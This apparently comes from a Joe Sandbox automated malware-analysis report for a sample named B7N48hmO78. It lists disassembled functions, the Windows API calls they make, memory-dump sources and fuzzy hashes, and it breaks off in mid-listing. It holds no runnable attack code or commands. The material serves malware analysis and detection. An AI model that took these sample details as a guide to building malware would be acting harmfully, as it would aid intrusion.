                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getptd_noexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3074181302-0
                                                                                                                  • Opcode ID: ffffababfe04062baf3a06b07bf60c9ab3d20811604e086f0567c7ec895a2873
                                                                                                                  • Instruction ID: 003ba30f32e1d07b92489c5b638f34930e43a860bc3bb5e2a0cc656993ce7c26
                                                                                                                  • Opcode Fuzzy Hash: ffffababfe04062baf3a06b07bf60c9ab3d20811604e086f0567c7ec895a2873
                                                                                                                  • Instruction Fuzzy Hash: 422181728046448FD7127FB8CC4539977E19F82335F256A60E4B07B2E2DB749DC18BA1
                                                                                                                  Function 00DE41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE4214: FreeLibrary.KERNEL32(00000000,?), ref: 00DE4247
                                                                                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00DE39FE,?,00000001), ref: 00DE41DB
                                                                                                                    • Part of subcall function 00DE4291: FreeLibrary.KERNEL32(00000000), ref: 00DE42C4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Free$Load
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2391024519-0
                                                                                                                  • Opcode ID: 880e548260b97c3ca62b2e50f2b1a1b00f24c84202b9b956c33893edab822c65
                                                                                                                  • Instruction ID: d08241bf6f3c7016715fc56bfb762ba03f350f6120af39d27865485402dfdd74
                                                                                                                  • Opcode Fuzzy Hash: 880e548260b97c3ca62b2e50f2b1a1b00f24c84202b9b956c33893edab822c65
                                                                                                                  • Instruction Fuzzy Hash: EF11C131700306AADB10BB76DC16B9E77A9DF40704F108829BA96BA1C1DA74DA449B74
                                                                                                                  Function 00E59B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClearVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1473721057-0
                                                                                                                  • Opcode ID: 8696fa79cbb25bc8b79a58a835849e17cf68301bb97eb40a8e4807694d24c548
                                                                                                                  • Instruction ID: f2270a0d3e1ef7bbc7acd738bdd8acbdf179323c2a962f502e465bae0d90a0d1
                                                                                                                  • Opcode Fuzzy Hash: 8696fa79cbb25bc8b79a58a835849e17cf68301bb97eb40a8e4807694d24c548
                                                                                                                  • Instruction Fuzzy Hash: E3212A70508615CFDB24DF28C844A2ABBF1BF84308F1A8968EA9657722C731E845CF62
                                                                                                                  Function 00E0AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ___lock_fhandle.LIBCMT ref: 00E0AFC0
                                                                                                                    • Part of subcall function 00E07BDA: __getptd_noexit.LIBCMT ref: 00E07BDA
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1144279405-0
                                                                                                                  • Opcode ID: e3b98fcbc23ea15b68580afc2f17b583d90d3eb8f6e2335974b79bd0ba4f5a4d
                                                                                                                  • Instruction ID: 5763bc1e2e16bf40eac0492083aea16207922ab7c32c88e38b09009f8899eb39
                                                                                                                  • Opcode Fuzzy Hash: e3b98fcbc23ea15b68580afc2f17b583d90d3eb8f6e2335974b79bd0ba4f5a4d
                                                                                                                  • Instruction Fuzzy Hash: 2111C172905604CFE7127FA4C84239A7BE1AF82335F196650E4B03F1E2D7B49DC08BA1
                                                                                                                  Function 00DE39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1029625771-0
                                                                                                                  • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                                                  • Instruction ID: 14873043313b3d9360aaf44ddb3a1703adfb90963ef9f4ea34b6ec9da24b1414
                                                                                                                  • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                                                  • Instruction Fuzzy Hash: 53013631500149AECF05FFA5C8918FEBB74EF11344F108069B656A7195EA30DA89DF75
                                                                                                                  Function 00E02AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __lock_file.LIBCMT ref: 00E02AED
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2597487223-0
                                                                                                                  • Opcode ID: 803b25b7fb867686fe2457aa8d873c7a13ad655eb8646f9e26af66446ebc5556
                                                                                                                  • Instruction ID: f2f8b9340a1d1b526190bb8f53d79089c5e38daf973cb3b17e4388c472e1a6e8
                                                                                                                  • Opcode Fuzzy Hash: 803b25b7fb867686fe2457aa8d873c7a13ad655eb8646f9e26af66446ebc5556
                                                                                                                  • Instruction Fuzzy Hash: 34F0C231A00205AADF31AFB4CC0A39F36F5BF00324F146419B510BA1D1DB788AE2DB41
                                                                                                                  Function 00DE4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00DE39FE,?,00000001), ref: 00DE4286
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 78d9f2488265208255395324859aa50f4566af103b0dc502d0e4a97ba4b5606f
                                                                                                                  • Instruction ID: dbc9b5b218d55be982cabd69934f83370275c9d5729b2d51607d59514d75eb32
                                                                                                                  • Opcode Fuzzy Hash: 78d9f2488265208255395324859aa50f4566af103b0dc502d0e4a97ba4b5606f
                                                                                                                  • Instruction Fuzzy Hash: D5F06571505741CFCB34AF66D894816B7F4BF04325324CA7EF2D682510C7719844DF64
                                                                                                                  Function 00DE40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DE40C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongNamePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 82841172-0
                                                                                                                  • Opcode ID: ce012cbaf4d8d1c52175507e80a799fd0fa10256c8925a29f728fcebd3da8a2d
                                                                                                                  • Instruction ID: 59b36629ea6a05ef43c9307a686ef0391abbbe9e3fc4c7f78213e7d6005ebbf9
                                                                                                                  • Opcode Fuzzy Hash: ce012cbaf4d8d1c52175507e80a799fd0fa10256c8925a29f728fcebd3da8a2d
                                                                                                                  • Instruction Fuzzy Hash: 6CE0C236A002245BC721A659DC46FEF77EDDF886E0F4940B5FA09E7244DAB4E9C186A0
                                                                                                                  Function 00E2BCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2638373210-0
                                                                                                                  • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                                                  • Instruction ID: 7c1f4b52ee382cadcdcc27615b1719e2dd6e05bf5c0343e360ab4510a3bdba17
                                                                                                                  • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                                                  • Instruction Fuzzy Hash: C9E092B0504B409BD7388A24D810BE373E4EB05309F00085CF6AA93242EBA278418659
                                                                                                                  Function 010B8B40 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?), ref: 010B8B4B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                  • Instruction ID: 5142d23fc3e31a3ae9789b7bc9c8539ba9f4572c08af3a6c36eeef72e9c5e6d6
                                                                                                                  • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                  • Instruction Fuzzy Hash: FDE08CB0A05208EFDB60CABC8894EEDB3ACD704320F008A96E946C32D0E6309A409618
                                                                                                                  Function 010B8B10 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?), ref: 010B8B1B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                  • Instruction ID: e75fb3d0572eb154fec7e2a18f84e8395fb0cc7950064fd092a8478782ae7edc
                                                                                                                  • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                  • Instruction Fuzzy Hash: EED0A77090520CEBCB10DFB89C44EDE77ACDB04320F008755FD15C3280D53199419754
                                                                                                                  Function 010BA52C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 010BA541
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                  • Instruction ID: 8e3033a99092397458eaeb3c51a01d5c91bc3ba1243e2c50836bb70c090cbe90
                                                                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                  • Instruction Fuzzy Hash: AFE0BF7494010DEFDB00EFA8D5496DE7BB4EF04301F1005A1FD05D7681DB309E54CA62
                                                                                                                  Function 010BA530 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 010BA541
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                  • Instruction ID: d853ffd56a125b7b638dd72600d2aba5a90981b999d3f7988e5aaf31c8050c21
                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                  • Instruction Fuzzy Hash: B3E0BF7494010DDFDB00EFA8D5496DE7BB4EF04301F100161FD0192281D6309A508A62

                                                                                                                  Non-executed Functions

                                                                                                                  Function 00E4F7FF Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00E4F87D
                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E4F8DC
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E4F919
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E4F940
                                                                                                                  • SendMessageW.USER32 ref: 00E4F966
                                                                                                                  • _wcsncpy.LIBCMT ref: 00E4F9D2
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00E4F9F3
                                                                                                                  • GetKeyState.USER32(00000009), ref: 00E4FA00
                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E4FA16
                                                                                                                  • GetKeyState.USER32(00000010), ref: 00E4FA20
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E4FA4F
                                                                                                                  • SendMessageW.USER32 ref: 00E4FA72
                                                                                                                  • SendMessageW.USER32(?,00001030,?,00E4E059), ref: 00E4FB6F
                                                                                                                  • SetCapture.USER32(?), ref: 00E4FB9F
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00E4FC03
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00E4FC29
                                                                                                                  • ReleaseCapture.USER32 ref: 00E4FC34
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E4FC69
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00E4FC76
                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E4FCD8
                                                                                                                  • SendMessageW.USER32 ref: 00E4FD02
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E4FD41
                                                                                                                  • SendMessageW.USER32 ref: 00E4FD6C
                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E4FD84
                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E4FD8F
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E4FDB0
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00E4FDBD
                                                                                                                  • GetParent.USER32(?), ref: 00E4FDD9
                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E4FE3F
                                                                                                                  • SendMessageW.USER32 ref: 00E4FE6F
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00E4FEC5
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E4FEF1
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E4FF19
                                                                                                                  • SendMessageW.USER32 ref: 00E4FF3C
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00E4FF86
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E4FFB6
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E5004B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                  • API String ID: 3461372671-4164748364
                                                                                                                  • Opcode ID: 3f5240432f546aec18407e83af64779bc94ba40fda070d267d1d2f4ac4065687
                                                                                                                  • Instruction ID: 19b34f06d2ae88a3e5cb58e19c2911c12aa64ec65e28a360525aa1d454a26252
                                                                                                                  • Opcode Fuzzy Hash: 3f5240432f546aec18407e83af64779bc94ba40fda070d267d1d2f4ac4065687
                                                                                                                  • Instruction Fuzzy Hash: 9C32CC70A04244EFDB14CF64DC84BAABBE4FF49798F041A29F655AB2A1C771EC08CB51
                                                                                                                  Function 00E4AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E4B1CD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
